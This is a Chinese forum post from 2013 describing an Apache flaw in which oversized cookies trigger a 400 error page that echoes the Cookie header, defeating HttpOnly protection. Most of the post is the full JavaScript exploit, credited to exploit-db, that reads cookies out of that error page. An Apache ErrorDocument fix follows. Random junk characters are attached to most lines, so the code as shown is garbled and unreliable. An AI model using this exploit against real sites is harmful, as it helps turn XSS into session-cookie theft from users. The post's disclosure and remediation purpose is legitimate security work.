很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。6 a6 }1 ?& t }# G
4 `5 `: N$ e* S' h
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
( M: c$ L* f; i& ^% d$ L
% c( t; ^. z. T
9 h2 c! H4 a# M0 b8 |5 ]- {# a6 k// http://www.exploit-db.com/exploits/18442// C% }( P; |9 N9 j/ [* q, d- ]
function setCookies (good) {. F4 w. N: b( ]# A
// Construct string for cookie value
6 ?& _8 G3 G. Avar str = "";
/ _8 F; P- h0 A* N0 p/ ]for (var i=0; i< 819; i++) {3 B7 m- o" v1 W7 Z) q
str += "x";! p9 n7 F( Y- l' r& h
}/ r. q0 |% d- _0 f# J4 p! C
// Set cookies1 m: t4 v+ k" Q; q( W# x7 v5 j
for (i = 0; i < 10; i++) {
- F1 ^" V- g0 K' \# [% J( C// Expire evil cookie4 w& v$ V$ ]! r- X! Z& s' K- D
if (good) {* @9 @3 _. p0 `' S# Y( ?
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";9 S5 P/ y9 D+ i9 p. A
}
& D, ~' J s1 f3 s7 `// Set evil cookie
0 b/ v" e- N( ?( g: m6 velse {+ `. Q, O+ }% Y9 M6 E! Z
var cookie = "xss"+i+"="+str+";path=/";
- U+ V/ w- j7 h1 R ?* o- ^}. L# Y# O0 [4 c9 v, E
document.cookie = cookie;( o% k* @' p% y* T1 q: @1 U6 _: @
}
: _+ R5 l7 Y+ b0 \0 B {2 @" G7 H6 t}4 ?8 h/ m! r; B6 l& M
function makeRequest() {7 c6 K2 O% j/ |6 p/ g
setCookies();
1 n6 [' ?3 k! ufunction parseCookies () {9 q; g" f, O& x8 J; H: ?
var cookie_dict = {};
) }& N G6 u; k: F// Only react on 400 status# L6 o2 N1 z1 S) h* W( A P( C% t( i
if (xhr.readyState === 4 && xhr.status === 400) {9 v3 a" l9 W( k; l8 d, V: `
// Replace newlines and match <pre> content
7 y: ~. |4 E6 E/ |9 B* s; A# \var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
) q/ q6 ]+ C$ @+ P7 n( Hif (content.length) {
) x1 B2 G' |% _// Remove Cookie: prefix
; m3 F- M! }6 r3 ?3 T2 W1 k) m, rcontent = content[1].replace("Cookie: ", ""); D- C& s# P' l$ J0 L6 i
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
8 s( |' |) F& {0 f// Add cookies to object
% K/ H, m9 e6 ]1 Gfor (var i=0; i<cookies.length; i++) {
% Q+ b- S1 ]0 @% `& gvar s_c = cookies.split('=',2);
% a+ s% e& g/ {6 F3 E4 P; Fcookie_dict[s_c[0]] = s_c[1];4 H5 o. @: b3 l" _; A
}
( m9 ]6 Y8 v! S* `+ O- V}+ \* {6 c: V6 J" o x% n3 l
// Unset malicious cookies& E* M3 ~9 o2 ~2 H8 @6 x& V
setCookies(true);
3 ^7 w1 h1 M6 D, H9 balert(JSON.stringify(cookie_dict));: ^& G3 C$ A/ j$ ~& l
}
A4 @8 e. Y( N" z+ l2 J}
6 _8 x; w; a# r' ^0 S* N* k% G1 j// Make XHR request% b: n7 |' I- p& K0 \. C, x
var xhr = new XMLHttpRequest();
7 I" M% j) V( r8 v' ^! N% R) x! b- Uxhr.onreadystatechange = parseCookies;! H0 L1 `6 M/ L
xhr.open("GET", "/", true);/ \5 B( {3 [ }1 x
xhr.send(null);) z' d$ M) G& v
}7 u: l/ g' D$ S. m
makeRequest();* v8 Q2 e( R* y. {# N
1 N5 R+ N: o+ Y6 m" O* T你就能看见华丽丽的400错误包含着cookie信息。 T" p& Q. q- H7 b2 [; U+ S
% Y) _+ d. g5 z, {' Z* j
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
$ S+ ?% I# D* o( g4 d7 u! M. i& x2 I" h9 x9 {2 J x1 Q6 ]
修复方案:
% p3 ^0 q8 c) e. o% v3 j1 a2 f" W: H# P/ r) t) _1 d9 W, z; F
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
8 j' u' E3 Q) j: O- I8 e" t
: o& `+ V1 A8 v1 M2 f4 b7 |, nIn the event of a problem or error, Apachecan be configured to do one of four things,
0 S- G3 }5 P+ V0 z- r8 R, y1 A
. x0 `* N/ `. ^7 w/ h/ W1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
/ P' B! v! [& X: f2. output acustomized message输出一段信息1 C9 L6 n, h" d; A# ^
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 & |- A: X" x, H% z" F- d
4. redirect to an external URL to handle theproblem/error转向一个外部URL7 J I& m1 ?0 r& l! d: C" n" b
% f! h" j! q% _1 H
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容* y. k$ L/ \4 j
9 E( M4 m/ H* v3 N5 Q% W k/ s
Apache配置:
) {2 z) [# V9 b; |- J0 ?1 H$ C7 K" Z# t' W- k- v% C3 T7 W
ErrorDocument400 " security test"
7 e. G' M, O9 M4 ?% [& Z7 d+ L
0 {. I# ~: V7 I2 Q8 g5 f当然,升级apache到最新也可:)。, |9 s: O4 r" Z" F2 Y
* \& f# P& _" u* f3 D4 a参考:http://httpd.apache.org/security/vulnerabilities_22.html2 B9 U/ H/ N- s. l' |2 Y% U
$ R+ s: ]0 l6 \; P$ P; ] |
发表于 2013-4-19 19:15:43
收藏
支持
反对